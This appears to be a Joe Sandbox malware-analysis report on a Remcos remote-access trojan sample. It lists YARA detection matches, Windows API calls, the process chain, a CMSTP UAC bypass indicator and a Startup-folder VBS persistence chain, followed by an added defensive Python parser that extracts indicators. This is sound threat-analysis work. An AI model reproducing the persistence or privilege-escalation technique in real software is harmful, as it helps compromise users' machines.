                    Source: 5.2.Milburr.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                    Source: 2.2.Milburr.exe.3630000.2.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                    Source: 2.2.Milburr.exe.3630000.2.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                    Source: 2.2.Milburr.exe.3630000.2.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                    Source: 00000005.00000002.2280428273.0000000000400000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                    Source: 00000005.00000002.2280428273.0000000000400000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                    Source: 00000005.00000002.2280428273.0000000000400000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                    Source: 00000004.00000002.2273702079.0000000003280000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                    Source: 00000004.00000002.2273702079.0000000003280000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                    Source: 00000004.00000002.2273702079.0000000003280000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                    Source: 00000002.00000002.4574181082.0000000003630000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                    Source: 00000002.00000002.4574181082.0000000003630000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                    Source: 00000002.00000002.4574181082.0000000003630000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                    Source: 00000005.00000002.2281391837.0000000003D80000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                    Source: 00000005.00000002.2281391837.0000000003D80000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                    Source: 00000005.00000002.2281391837.0000000003D80000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                    Source: 00000002.00000002.4567862337.0000000000400000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                    Source: 00000002.00000002.4567862337.0000000000400000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                    Source: 00000002.00000002.4567862337.0000000000400000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                    Source: Process Memory Space: Milburr.exe PID: 3652, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                    Source: Process Memory Space: Milburr.exe PID: 364, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                    Source: Process Memory Space: Milburr.exe PID: 5160, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: classification engine | Classification label: mal100.rans.troj.spyw.expl.evad.winEXE@8/13@0/1
Source: C:\Users\user\Desktop\l1QC9H0SNR.exe | Code function: 0_2_00BBA06A GetLastError,FormatMessageW
Source: C:\Users\user\Desktop\l1QC9H0SNR.exe | Code function: 0_2_00BA81CB AdjustTokenPrivileges,CloseHandle
Source: C:\Users\user\Desktop\l1QC9H0SNR.exe | Code function: 0_2_00BA87E1 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError
Source: C:\Users\user\AppData\Local\obtenebrate\Milburr.exe | Code function: 2_2_00416AB7 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError
Source: C:\Users\user\AppData\Local\obtenebrate\Milburr.exe | Code function: 2_2_007181CB AdjustTokenPrivileges,CloseHandle
Source: C:\Users\user\AppData\Local\obtenebrate\Milburr.exe | Code function: 2_2_007187E1 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError
Source: C:\Users\user\AppData\Local\obtenebrate\Milburr.exe | Code function: 5_2_00416AB7 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError
Source: C:\Users\user\Desktop\l1QC9H0SNR.exe | Code function: 0_2_00BBB3FB SetErrorMode,GetDiskFreeSpaceExW,SetErrorMode
Source: C:\Users\user\Desktop\l1QC9H0SNR.exe | Code function: 0_2_00BCEE0D CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle
Source: C:\Users\user\Desktop\l1QC9H0SNR.exe | Code function: 0_2_00BC83BB CoInitialize,CoUninitialize,CoCreateInstance,IIDFromString,VariantInit,VariantClear
Source: C:\Users\user\Desktop\l1QC9H0SNR.exe | Code function: 0_2_00B54E89 CreateStreamOnHGlobal,FindResourceExW,LoadResource,SizeofResource,LockResource
Source: C:\Users\user\AppData\Local\obtenebrate\Milburr.exe | Code function: 2_2_00419BC4 OpenSCManagerW,OpenServiceW,CloseServiceHandle,StartServiceW,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle
Source: C:\Users\user\Desktop\l1QC9H0SNR.exe | File created: C:\Users\user\AppData\Local\obtenebrate
Source: C:\Users\user\AppData\Local\obtenebrate\Milburr.exe | Mutant created: \Sessions\1\BaseNamedObjects\Rmc-MKYDDH
Source: C:\Users\user\Desktop\l1QC9H0SNR.exe | File created: C:\Users\user\AppData\Local\Temp\aut7743.tmp
Source: unknown | Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Milburr.vbs"
Source: C:\Windows\System32\wscript.exe | File read: C:\Users\user\Desktop\desktop.ini
Source: C:\Users\user\Desktop\l1QC9H0SNR.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: l1QC9H0SNR.exe | Virustotal: Detection: 68%
Source: l1QC9H0SNR.exe | ReversingLabs: Detection: 75%
Source: C:\Users\user\Desktop\l1QC9H0SNR.exe | File read: C:\Users\user\Desktop\l1QC9H0SNR.exe
Source: unknown | Process created: C:\Users\user\Desktop\l1QC9H0SNR.exe "C:\Users\user\Desktop\l1QC9H0SNR.exe"
Source: C:\Users\user\Desktop\l1QC9H0SNR.exe | Process created: C:\Users\user\AppData\Local\obtenebrate\Milburr.exe "C:\Users\user\Desktop\l1QC9H0SNR.exe"
Source: unknown | Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Milburr.vbs"
Source: C:\Windows\System32\wscript.exe | Process created: C:\Users\user\AppData\Local\obtenebrate\Milburr.exe "C:\Users\user\AppData\Local\obtenebrate\Milburr.exe"
Source: C:\Users\user\AppData\Local\obtenebrate\Milburr.exe | Process created: C:\Users\user\AppData\Local\obtenebrate\Milburr.exe "C:\Users\user\AppData\Local\obtenebrate\Milburr.exe"
Source: C:\Users\user\Desktop\l1QC9H0SNR.exe | Process created: C:\Users\user\AppData\Local\obtenebrate\Milburr.exe "C:\Users\user\Desktop\l1QC9H0SNR.exe"
Source: C:\Windows\System32\wscript.exe | Process created: C:\Users\user\AppData\Local\obtenebrate\Milburr.exe "C:\Users\user\AppData\Local\obtenebrate\Milburr.exe"
Source: C:\Users\user\AppData\Local\obtenebrate\Milburr.exe | Process created: C:\Users\user\AppData\Local\obtenebrate\Milburr.exe "C:\Users\user\AppData\Local\obtenebrate\Milburr.exe"
Source: C:\Users\user\Desktop\l1QC9H0SNR.exe | Section loaded: iphlpapi.dll
Source: C:\Users\user\Desktop\l1QC9H0SNR.exe | Section loaded: mpr.dll
Source: C:\Users\user\Desktop\l1QC9H0SNR.exe | Section loaded: userenv.dll
Source: C:\Users\user\Desktop\l1QC9H0SNR.exe | Section loaded: uxtheme.dll
Source: C:\Users\user\Desktop\l1QC9H0SNR.exe | Section loaded: version.dll
Source: C:\Users\user\Desktop\l1QC9H0SNR.exe | Section loaded: wininet.dll
Source: C:\Users\user\Desktop\l1QC9H0SNR.exe | Section loaded: winmm.dll
Source: C:\Users\user\Desktop\l1QC9H0SNR.exe | Section loaded: wsock32.dll
Source: C:\Users\user\Desktop\l1QC9H0SNR.exe | Section loaded: kernel.appcore.dll
Source: C:\Users\user\Desktop\l1QC9H0SNR.exe | Section loaded: windows.storage.dll
Source: C:\Users\user\Desktop\l1QC9H0SNR.exe | Section loaded: wldp.dll
Source: C:\Users\user\Desktop\l1QC9H0SNR.exe | Section loaded: cryptsp.dll
Source: C:\Users\user\Desktop\l1QC9H0SNR.exe | Section loaded: rsaenh.dll
Source: C:\Users\user\Desktop\l1QC9H0SNR.exe | Section loaded: cryptbase.dll
Source: C:\Users\user\Desktop\l1QC9H0SNR.exe | Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\obtenebrate\Milburr.exe | Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\obtenebrate\Milburr.exe | Section loaded: mpr.dll
Source: C:\Users\user\AppData\Local\obtenebrate\Milburr.exe | Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\obtenebrate\Milburr.exe | Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\obtenebrate\Milburr.exe | Section loaded: version.dll
Source: C:\Users\user\AppData\Local\obtenebrate\Milburr.exe | Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\obtenebrate\Milburr.exe | Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\obtenebrate\Milburr.exe | Section loaded: wsock32.dll
Source: C:\Users\user\AppData\Local\obtenebrate\Milburr.exe | Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\obtenebrate\Milburr.exe | Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\obtenebrate\Milburr.exe | Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\obtenebrate\Milburr.exe | Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\obtenebrate\Milburr.exe | Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\obtenebrate\Milburr.exe | Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\obtenebrate\Milburr.exe | Section loaded: netutils.dll
Source: C:\Users\user\AppData\Local\obtenebrate\Milburr.exe | Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\obtenebrate\Milburr.exe | Section loaded: mswsock.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: version.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: uxtheme.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: sxs.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: vbscript.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: amsi.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: userenv.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: profapi.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: wldp.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: msasn1.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: cryptsp.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: rsaenh.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: cryptbase.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: msisip.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: wshext.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: scrobj.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: mlang.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: mpr.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: scrrun.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: windows.storage.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: propsys.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: edputil.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: urlmon.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: iertutil.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: srvcli.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: netutils.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: windows.staterepositoryps.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: sspicli.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: wintypes.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: appresolver.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: bcp47langs.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: slc.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: sppc.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: onecorecommonproxystub.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Users\user\AppData\Local\obtenebrate\Milburr.exe | Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\obtenebrate\Milburr.exe | Section loaded: mpr.dll
Source: C:\Users\user\AppData\Local\obtenebrate\Milburr.exe | Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\obtenebrate\Milburr.exe | Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\obtenebrate\Milburr.exe | Section loaded: version.dll
Source: C:\Users\user\AppData\Local\obtenebrate\Milburr.exe | Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\obtenebrate\Milburr.exe | Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\obtenebrate\Milburr.exe | Section loaded: wsock32.dll
Source: C:\Users\user\AppData\Local\obtenebrate\Milburr.exe | Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\obtenebrate\Milburr.exe | Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\obtenebrate\Milburr.exe | Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\obtenebrate\Milburr.exe | Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\obtenebrate\Milburr.exe | Section loaded: mpr.dll
Source: C:\Users\user\AppData\Local\obtenebrate\Milburr.exe | Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\obtenebrate\Milburr.exe | Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\obtenebrate\Milburr.exe | Section loaded: version.dll
Source: C:\Users\user\AppData\Local\obtenebrate\Milburr.exe | Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\obtenebrate\Milburr.exe | Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\obtenebrate\Milburr.exe | Section loaded: wsock32.dll
Source: C:\Users\user\AppData\Local\obtenebrate\Milburr.exe | Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\obtenebrate\Milburr.exe | Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\obtenebrate\Milburr.exe | Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\obtenebrate\Milburr.exe | Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\obtenebrate\Milburr.exe | Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\obtenebrate\Milburr.exe | Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\obtenebrate\Milburr.exe | Section loaded: netutils.dll
Source: C:\Windows\System32\wscript.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32
Source: C:\Users\user\Desktop\l1QC9H0SNR.exe | Code function: 0_2_00CB2A60 EntryPoint,LoadLibraryA,GetProcAddress,ExitProcess,VirtualProtect,VirtualProtect,VirtualProtect
Source: C:\Users\user\Desktop\l1QC9H0SNR.exe | Code function: 0_2_00B78945 push ecx; ret 0_2_00B78958
Source: C:\Users\user\AppData\Local\obtenebrate\Milburr.exe | Code function: 2_2_004567E0 push eax; ret 2_2_004567FE
Source: C:\Users\user\AppData\Local\obtenebrate\Milburr.exe | Code function: 2_2_0045B9DD push esi; ret 2_2_0045B9E6
Source: C:\Users\user\AppData\Local\obtenebrate\Milburr.exe | Code function: 2_2_00455EAF push ecx; ret 2_2_00455EC2
Source: C:\Users\user\AppData\Local\obtenebrate\Milburr.exe | Code function: 2_2_00433FF6 push ecx; ret 2_2_00434009
Source: C:\Users\user\AppData\Local\obtenebrate\Milburr.exe | Code function: 2_2_006CC4C4 push A3006CBAh; retn 006Ch 2_2_006CC50D
Source: C:\Users\user\AppData\Local\obtenebrate\Milburr.exe | Code function: 2_2_006E8945 push ecx; ret 2_2_006E8958
Source: C:\Users\user\AppData\Local\obtenebrate\Milburr.exe | Code function: 2_2_006C2F12 push es; retf 2_2_006C2F13
Source: C:\Users\user\AppData\Local\obtenebrate\Milburr.exe | Code function: 5_2_004567E0 push eax; ret 5_2_004567FE
Source: C:\Users\user\AppData\Local\obtenebrate\Milburr.exe | Code function: 5_2_0045B9DD push esi; ret 5_2_0045B9E6
Source: C:\Users\user\AppData\Local\obtenebrate\Milburr.exe | Code function: 5_2_00455EAF push ecx; ret 5_2_00455EC2
Source: C:\Users\user\AppData\Local\obtenebrate\Milburr.exe | Code function: 5_2_00433FF6 push ecx; ret 5_2_00434009
Source: initial sample | Static PE information: section name: UPX0
Source: initial sample | Static PE information: section name: UPX1
Source: initial sample | Static PE information: section name: UPX0
Source: initial sample | Static PE information: section name: UPX1
Source: C:\Users\user\AppData\Local\obtenebrate\Milburr.exe | Code function: 2_2_00406128 ShellExecuteW,URLDownloadToFileW
Source: C:\Users\user\Desktop\l1QC9H0SNR.exe | File created: C:\Users\user\AppData\Local\obtenebrate\Milburr.exe

                    Boot Survival

Source: C:\Users\user\AppData\Local\obtenebrate\Milburr.exe | File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Milburr.vbs (dropped file)
Source: C:\Users\user\AppData\Local\obtenebrate\Milburr.exe | File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Milburr.vbs
Source: C:\Users\user\AppData\Local\obtenebrate\Milburr.exe | Code function: 2_2_00419BC4 OpenSCManagerW,OpenServiceW,CloseServiceHandle,StartServiceW,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle
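The persistence this report records is a plain chain: Milburr.exe writes Milburr.vbs into the per-user Startup folder, at logon wscript.exe runs that script, and the script starts Milburr.exe again from AppData\Local. The Python below is an added example, not part of the Joe Sandbox report or of the sample: it parses the report's flattened `Source: <x><Kind>: <detail>` lines (a few copied verbatim from this page as constructed input), collects the mutex, the dropped files and the parent/child process edges as IOCs, and flags the Startup-folder script-host chain. The list of detail kinds, the link residue it strips from the cells, and the path heuristics in `find_startup_persistence` are this example's own assumptions.

```python
"""Added example (not Joe Sandbox code): turn the report's flattened signature
lines into structured IOCs and flag the Startup-folder persistence chain."""
import re

# Detail-column keywords used to split the fused "Source: <x><Kind>: <detail>" lines.
# Assumption: these are the kinds that appear on this page; extend as needed.
KINDS = (
    "Mutant created", "File created", "Process created", "Section loaded",
    "Key opened", "Key value queried", "Code function", "File read",
    "Matched rule", "Classification label", "Static PE information",
    "Process information set", "Virustotal", "ReversingLabs",
)
LINE_RE = re.compile(
    r"^Source: (?P<source>.*?)(?P<kind>" + "|".join(re.escape(k) for k in KINDS) + r"): ?(?P<detail>.*)$"
)
RESIDUE = ("Jump to behavior", "Jump to dropped file")  # link text left over from the HTML table
STARTUP_DIR = r"\start menu\programs\startup"            # lowercase fragment of the per-user Startup folder
SCRIPT_HOSTS = ("wscript.exe", "cscript.exe")

# Constructed sample input: lines copied from this report's signature table.
SAMPLE_LINES = [
    r"Source: C:\Users\user\AppData\Local\obtenebrate\Milburr.exeMutant created: \Sessions\1\BaseNamedObjects\Rmc-MKYDDH",
    r"Source: C:\Users\user\Desktop\l1QC9H0SNR.exeFile created: C:\Users\user\AppData\Local\obtenebrate\Milburr.exeJump to dropped file",
    r"Source: C:\Users\user\AppData\Local\obtenebrate\Milburr.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Milburr.vbsJump to dropped file",
    r'Source: unknownProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Milburr.vbs"',
    r'Source: C:\Windows\System32\wscript.exeProcess created: C:\Users\user\AppData\Local\obtenebrate\Milburr.exe "C:\Users\user\AppData\Local\obtenebrate\Milburr.exe"Jump to behavior',
    r'Source: C:\Users\user\Desktop\l1QC9H0SNR.exeProcess created: C:\Users\user\AppData\Local\obtenebrate\Milburr.exe "C:\Users\user\Desktop\l1QC9H0SNR.exe"Jump to behavior',
]


def parse_line(line):
    """Split one flattened report line into source / kind / detail; None if it is not one."""
    m = LINE_RE.match(line.strip())
    if not m:
        return None
    detail = m.group("detail").strip()
    for residue in RESIDUE:
        if detail.endswith(residue):
            detail = detail[: -len(residue)].rstrip()
    rec = {"source": m.group("source").strip(), "kind": m.group("kind"), "detail": detail}
    if rec["kind"] == "Process created":
        # Joe Sandbox prints the image path first, then the quoted command line.
        rec["image"], _, rec["cmdline"] = detail.partition(" ")
    return rec


def parse_report(lines):
    return [rec for rec in (parse_line(line) for line in lines) if rec]


def _basename(path):
    return path.rsplit("\\", 1)[-1].lower()


def extract_iocs(records):
    """Collect mutex names, dropped files, Startup-folder scripts and parent->child process edges."""
    iocs = {"mutexes": [], "dropped_files": [], "startup_scripts": [], "process_chain": []}
    for r in records:
        if r["kind"] == "Mutant created":
            iocs["mutexes"].append(r["detail"].rsplit("\\", 1)[-1])
        elif r["kind"] == "File created" and r["detail"].lower().endswith((".exe", ".dll", ".vbs", ".js", ".lnk")):
            iocs["dropped_files"].append(r["detail"])
            if STARTUP_DIR in r["detail"].lower():
                iocs["startup_scripts"].append(r["detail"])
        elif r["kind"] == "Process created":
            iocs["process_chain"].append((r["source"], r["image"]))
    return {k: list(dict.fromkeys(v)) for k, v in iocs.items()}  # de-duplicate, keep order


def find_startup_persistence(records):
    """Flag the chain this report shows: a script host run from the Startup folder,
    then that script host spawning an executable out of the user profile."""
    findings = []
    procs = [r for r in records if r["kind"] == "Process created"]
    for r in procs:
        if _basename(r["image"]) in SCRIPT_HOSTS and STARTUP_DIR in r["cmdline"].lower():
            findings.append("script host launched from Startup folder: " + r["cmdline"])
    for r in procs:
        if _basename(r["source"]) in SCRIPT_HOSTS and r"\appdata\local" in r["image"].lower():
            findings.append(_basename(r["source"]) + " spawned user-profile executable: " + r["image"])
    return findings


if __name__ == "__main__":
    recs = parse_report(SAMPLE_LINES)
    for name, values in extract_iocs(recs).items():
        print(name, values)
    for finding in find_startup_persistence(recs):
        print("FINDING:", finding)
```

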